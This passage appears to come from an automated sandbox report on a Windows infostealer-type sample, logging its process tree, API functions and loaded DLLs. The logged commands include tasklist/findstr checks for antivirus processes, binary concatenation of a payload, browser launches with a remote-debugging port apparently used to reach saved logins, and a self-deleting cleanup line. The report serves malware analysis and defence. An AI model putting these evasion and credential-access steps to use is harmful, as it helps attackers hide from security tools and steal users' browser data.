                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C46ADE16_2_00C46ADE
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C82A0516_2_00C82A05
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C78BFF16_2_00C78BFF
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C2CD7A16_2_00C2CD7A
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C3CE1016_2_00C3CE10
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C4715916_2_00C47159
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C1924016_2_00C19240
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00CA531116_2_00CA5311
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C196E016_2_00C196E0
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C3170416_2_00C31704
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C31A7616_2_00C31A76
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C37B8B16_2_00C37B8B
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C19B6016_2_00C19B60
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C37DBA16_2_00C37DBA
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C31D2016_2_00C31D20
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C31FE716_2_00C31FE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\325114\Miniature.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: String function: 00C2FD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: String function: 00C30DA0 appears 46 times
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: String function: 004062CF appears 57 times
                Source: pM3fQBuTLy.exeStatic PE information: invalid certificate
                Source: pM3fQBuTLy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@89/293@21/18
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C841FA GetLastError,FormatMessageW,16_2_00C841FA
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C72010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00C72010
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C71A0B AdjustTokenPrivileges,CloseHandle,16_2_00C71A0B
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,16_2_00C7DD87
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C83A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,16_2_00C83A0E
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\HHTG6LYI.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsg348A.tmpJump to behavior
                Source: pM3fQBuTLy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: chrome.exe, 00000015.00000002.1724366438.0000010400668000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: VKNG4E3OZ.16.dr, VS0RQIWB1.16.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: pM3fQBuTLy.exeVirustotal: Detection: 9%
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeFile read: C:\Users\user\Desktop\pM3fQBuTLy.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\pM3fQBuTLy.exe "C:\Users\user\Desktop\pM3fQBuTLy.exe"
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 325114
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Grocery" Pink
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Through + ..\Aspects + ..\Except + ..\Prevention d
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Miniature.com d
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2432,i,10762324331143125605,3752248268113785829,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6048 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6540 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1092 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 325114Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Grocery" Pink Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Through + ..\Aspects + ..\Except + ..\Prevention dJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Miniature.com dJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2432,i,10762324331143125605,3752248268113785829,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6048 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6540 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1092 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: rstrtmgr.dllJump to behavior
